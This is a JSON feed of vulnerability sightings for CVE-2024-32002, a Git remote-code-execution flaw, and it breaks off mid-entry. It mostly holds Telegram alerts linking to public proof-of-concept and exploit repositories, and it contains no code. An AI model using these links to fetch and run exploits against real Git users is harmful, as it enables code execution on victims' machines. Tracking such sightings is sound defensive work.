{"vulnerability": "CVE-2024-32002", "sightings": [{"uuid": "c6cca849-955d-49c0-b832-5e30c827c475", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1301", "content": "", "creation_timestamp": "2024-05-24T04:00:00.000000Z"}, {"uuid": "c6a4def3-bd43-4b82-b530-56a6a28a3da8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3m4o7kwwdn22p", "content": "", "creation_timestamp": "2025-11-02T19:12:43.708983Z"}, {"uuid": "2b3d80ad-6b4a-440d-ac14-9a2bad875782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "https://gist.github.com/alvinzane/770d6fbf8d62161d03f968a1cf4d42c6", "content": "", "creation_timestamp": "2026-02-27T15:36:34.000000Z"}, {"uuid": "db00de70-3287-4505-9a96-5b356825fd13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7748", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1apoc for CVE-2024-32002\nURL\uff1ahttps://github.com/Yitian26/git_rce\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-23T06:11:23.000000Z"}, {"uuid": "448b2919-f2ea-43aa-910e-de09fb12824c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "https://gist.github.com/hiboma/c9e8914ba2e4ac45bc2b0bf8aed9eaea", "content": "", "creation_timestamp": "2026-04-01T05:17:46.000000Z"}, {"uuid": "4c66b5cd-61cf-431c-96f4-786372129a5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8165", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aadapting CVE-2024-32002 for running offline and locally\nURL\uff1ahttps://github.com/chrisWalker11/running-CVE-2024-32002-locally-for-tesing\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-04T17:41:40.000000Z"}, {"uuid": "dd5a0212-c1fe-4c1c-8d94-376f01692c75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7493", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1ahttps://www.cve.org/CVERecord?id=CVE-2024-32002\nURL\uff1ahttps://github.com/tobelight/cve_2024_32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-01T12:31:43.000000Z"}, {"uuid": "dd8e7048-e294-48bf-ab49-b4cf50a65478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8108", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRCE through git recursive cloning. \nURL\uff1ahttps://github.com/HexDoesRandomShit/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-29T01:09:59.000000Z"}, {"uuid": "0ce86c07-be7d-4bb3-9ce2-8fe024524a39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8115", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aGIT RCE\nURL\uff1ahttps://github.com/charlesgargasson/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-29T10:02:16.000000Z"}, {"uuid": "c6ef5ea7-2fd2-4481-a27e-6af5885be722", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8153", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aadapting CVE-2024-32002 for running offline and locally\nURL\uff1ahttps://github.com/chrisWalker11/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-02T18:45:13.000000Z"}, {"uuid": "f74c94f1-20b9-446f-b03d-685259fab95e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8131", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aJust small script to exploit CVE-2024-32002\nURL\uff1ahttps://github.com/tiyeume25112004/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-30T23:25:42.000000Z"}, {"uuid": "fe635d66-631c-453b-bc71-a251b8f2276f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7841", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC for CVE-2024-32002\nURL\uff1ahttps://github.com/EQSTSeminar/git_rce\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-03T01:33:58.000000Z"}, {"uuid": "68e762e0-5fe9-4514-baec-21a9fb6f10f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/cKure/12931", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Critical Git vulnerability allows RCE when cloning repositories with submodules (CVE-2024-32002).\n\nhttps://www.helpnetsecurity.com/2024/05/16/git-cve-2024-32002/", "creation_timestamp": "2024-05-18T07:30:24.000000Z"}, {"uuid": "08fae603-b868-4eb2-9cd0-2a71ad520189", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8130", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC of CVE-2024-32002 - Remote Code Execution while cloning special-crafted local repositories\nURL\uff1ahttps://github.com/NishanthAnand21/CVE-2024-32002-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-30T15:00:58.000000Z"}, {"uuid": "d6758176-4232-43b9-80e3-43ba0dc5db6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9147", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002 \u662f Git \u4e2d\u7684\u4e00\u4e2a\u4e25\u91cd\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5728\u7528\u6237\u6267\u884c git clone \u64cd\u4f5c\u65f6\u8fdc\u7a0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff08RCE\uff09\u3002\nURL\uff1ahttps://github.com/XiaomingX/CVE-2024-32002-poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-23T04:08:41.000000Z"}, {"uuid": "084760d2-6bc7-4329-a664-46c531b63abd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9380", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAn example of a repo that would make use of the CVE-2024-32002\nURL\uff1ahttps://github.com/jolibb55/donald\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-11T08:46:48.000000Z"}, {"uuid": "d16db5bc-2def-4621-b64b-3814c8df2ed0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9378", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAn example of a repo that would make use of the CVE-2024-32002\nURL\uff1ahttps://github.com/jolibb55/CVE-2024-32002_RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-11T07:26:03.000000Z"}, {"uuid": "db051a1c-fec7-4fe5-9976-b8062205470c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8612", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis is a demo for CVE-2024-32002 POC\nURL\uff1ahttps://github.com/Masamuneee/CVE-2024-32002-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-27T03:11:44.000000Z"}, {"uuid": "72935a9f-1ca1-4641-b354-d410a8f733a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7718", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aexploit for CVE-2024-32002\nURL\uff1ahttps://github.com/bonnettheo/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-20T07:39:50.000000Z"}, {"uuid": "493cadce-cacb-4e4e-a13d-f684422bbf1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8613", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis is a demo for CVE-2024-32002 POC\nURL\uff1ahttps://github.com/Masamuneee/hook\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-27T03:36:50.000000Z"}, {"uuid": "b814bfa2-d197-4228-a4bb-f10609c82579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "https://t.me/GithubRedTeam/7366", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32640-SQLI-MuraCMS, Create Admin user\nURL\uff1ahttps://github.com/JJoosh/CVE-2024-32002-Reverse-Shell\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-21T13:48:34.000000Z"}, {"uuid": "06e53ab9-9705-4330-ab4a-bcdd29bf70ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8699", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSimple repo to exploit CVE-2024-32002\nURL\uff1ahttps://github.com/Julian-gmz/Ensimag_CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-08T11:07:30.000000Z"}, {"uuid": "bc07a013-eec1-4c63-b1bb-60d357738526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7380", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRepo for testing CVE-2024-32002\nURL\uff1ahttps://github.com/vincepsh/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-22T18:46:26.000000Z"}, {"uuid": "51cdf1c4-4391-459f-b1c6-d1dc4d4d2822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7337", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1alocal poc for CVE-2024-32002\nURL\uff1ahttps://github.com/M507/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-19T01:21:10.000000Z"}, {"uuid": "a81af933-07fc-42cd-a259-fb902aef56db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7336", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002 RCE PoC\nURL\uff1ahttps://github.com/safebuffer/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-18T15:17:46.000000Z"}, {"uuid": "62bd305a-97b0-4d2d-ba8b-a201f3ec6a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7340", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aHook for the PoC for exploiting CVE-2024-32002\nURL\uff1ahttps://github.com/amalmurali47/hook\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-19T06:33:59.000000Z"}, {"uuid": "199d55af-9ca2-4c93-a73d-cf36ea2c5b9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7329", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA submodule for exploiting CVE-2024-32002 vulnerability\nURL\uff1ahttps://github.com/markuta/hooky\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-18T01:07:15.000000Z"}, {"uuid": "90f51594-1195-4f69-8cd6-48574e25d46b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7362", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002 hook POC\nURL\uff1ahttps://github.com/Roronoawjd/hook\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-21T12:29:15.000000Z"}, {"uuid": "b32c1680-dc97-43a1-88b0-33655fdc5935", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7339", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit PoC for CVE-2024-32002\nURL\uff1ahttps://github.com/amalmurali47/git_rce\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-19T06:29:49.000000Z"}, {"uuid": "cb7e4a7c-dfcb-4bf7-856f-466e95aed378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7345", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002-hook\nURL\uff1ahttps://github.com/10cks/hook\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-20T02:51:07.000000Z"}, {"uuid": "2444f7a5-ecb1-4a7c-afc5-c67cd78f94a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7344", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002=captain\nURL\uff1ahttps://github.com/10cks/captain\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-20T02:46:51.000000Z"}, {"uuid": "9495c82b-e301-4661-9339-382c25ae2d79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7374", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1ahook for CVE-2024-32002\nURL\uff1ahttps://github.com/WOOOOONG/hook\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-22T05:18:25.000000Z"}, {"uuid": "25335fa2-c05d-47a0-abe6-75124c9b692c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7364", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002 POC\nURL\uff1ahttps://github.com/Roronoawjd/git_rce\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-21T13:28:16.000000Z"}, {"uuid": "227efc25-98a5-4e81-a2a3-5c6149e7c516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7388", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1apoc for git rce using CVE-2024-32002\nURL\uff1ahttps://github.com/fadhilthomas/poc-git-rce-cve-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-23T07:59:54.000000Z"}, {"uuid": "61be00c6-0506-4794-83b0-f391ca444328", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "https://t.me/GithubRedTeam/7373", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002\nURL\uff1ahttps://github.com/absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-22T04:22:54.000000Z"}, {"uuid": "53e9dab3-0bcc-4de7-8ae9-7e4201830615", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7371", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002\nURL\uff1ahttps://github.com/WOOOOONG/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-22T03:49:04.000000Z"}, {"uuid": "514014c0-bfd7-4d23-b74b-bd0b8c1d78d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7381", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002-hook\nURL\uff1ahttps://github.com/vincepsh/CVE-2024-32002-hook\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-22T18:54:46.000000Z"}, {"uuid": "a7d9503d-292e-4549-92fb-dae81e16c53f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7403", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1apoc for git rce using CVE-2024-32002\nURL\uff1ahttps://github.com/fadhilthomas/poc-cve-2024-32002\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-05-24T10:26:24.000000Z"}, {"uuid": "aef4145c-05b2-4121-9a5a-4ff512ae92b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7406", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002 PoC\nURL\uff1ahttps://github.com/e-lliot/test\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-24T13:08:03.000000Z"}, {"uuid": "4499c6a6-06e3-401c-aee8-02bd573ab2c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7458", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002 poc test\nURL\uff1ahttps://github.com/431m/rcetest\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-30T06:16:56.000000Z"}, {"uuid": "3855a13a-6798-40c9-8345-e45d868726f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7473", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32002wakuwaku\nURL\uff1ahttps://github.com/AD-Appledog/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-31T02:42:44.000000Z"}, {"uuid": "1d16d971-d95c-4cc7-b575-b412d90b5de5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7471", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA proof of concept for the git vulnerability CVE-2024-32002\nURL\uff1ahttps://github.com/markuta/CVE-2024-32002\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-30T21:13:01.000000Z"}, {"uuid": "0b420f18-4813-4471-bcb4-d56c110e091e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "Telegram/2Eqz6E7XYyETwBKa5y29ppyBld-HesnUwhJGUaKWD46GURI", "content": "", "creation_timestamp": "2025-09-25T09:00:04.000000Z"}, {"uuid": "03a9a837-9e82-483f-96ed-00d3967a8961", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": 